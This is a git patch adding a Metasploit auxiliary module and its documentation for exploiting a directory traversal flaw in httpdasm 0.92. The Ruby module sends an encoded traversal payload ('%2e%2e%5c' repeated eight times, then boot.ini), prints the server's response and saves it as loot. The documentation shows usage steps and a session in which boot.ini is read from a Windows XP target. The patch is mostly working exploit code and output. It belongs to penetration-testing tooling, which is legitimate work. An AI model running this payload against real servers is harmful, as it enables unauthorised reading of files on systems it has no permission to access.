From 17c0bc1fa7005273dee215e40fd548e81c762da3 Mon Sep 17 00:00:00 2001
From: Wei Chen <wei_chen@rapid7.com>
Date: Tue, 19 Jun 2018 14:56:36 -0500
Subject: [PATCH] Land #10183, Add auxiliary mod to exploit httpdasm dir
 traversal vuln

---
 .../http/httpdasm_directory_traversal.md      | 34 +++++++++++++
 .../http/httpdasm_directory_traversal.rb      | 51 +++++++++++++++++++
 2 files changed, 85 insertions(+)
 create mode 100644 documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md
 create mode 100644 modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb

diff --git a/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md b/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md
new file mode 100644
index 0000000000..957b283363
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md
@@ -0,0 +1,34 @@
+## Description
+
+  This module exploits a directory traversal vulnerability to read files from a server running httpdasm v0.92.
+
+## Vulnerable Application
+
+  httpdasm 0.92
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use [auxiliary/scanner/http/httpdasm_directory_traversal]`
+  3. `set RHOSTS [IP]`
+  4. `run`
+
+## Scenarios
+
+### Tested on Windows XP x86
+
+  ```
+  msf5 > use auxiliary/scanner/http/httpdasm_directory_traversal
+  msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > set rhosts 192.168.37.128
+  rhosts => 192.168.37.128
+  msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > run
+
+  [boot loader]
+  timeout=30
+  default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
+  [operating systems]
+  multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
+
+  [*] Auxiliary module execution completed
+  msf5 auxiliary(scanner/http/httpdasm_directory_traversal) >
+  ```
diff --git a/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb b/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb
new file mode 100644
index 0000000000..193a602916
--- /dev/null
+++ b/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb
@@ -0,0 +1,51 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Httpdasm Directory Traversal',
+      'Description'    => %q{
+        This module allows for traversing the file system of a host running httpdasm v0.92.
+      },
+      'Author'         =>
+        [
+          'John Leitch', # EDB POC
+          'Shelby Pace' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '15861']
+        ]
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [true, 'Path to traverse to', '%2e%2e%5c' * 8 + 'boot.ini'])
+    ])
+
+  end
+
+  def run
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path)
+    })
+
+    if res && res.code == 200
+      print_status(res.body)
+      path = store_loot('httpdasm.file', 'application/octet-stream', rhost, res.body)
+    else
+      if res
+        print_error("Unexpected response from server: #{res.code}")
+      else
+        print_error("The server timed out.")
+      end
+    end
+  end
+end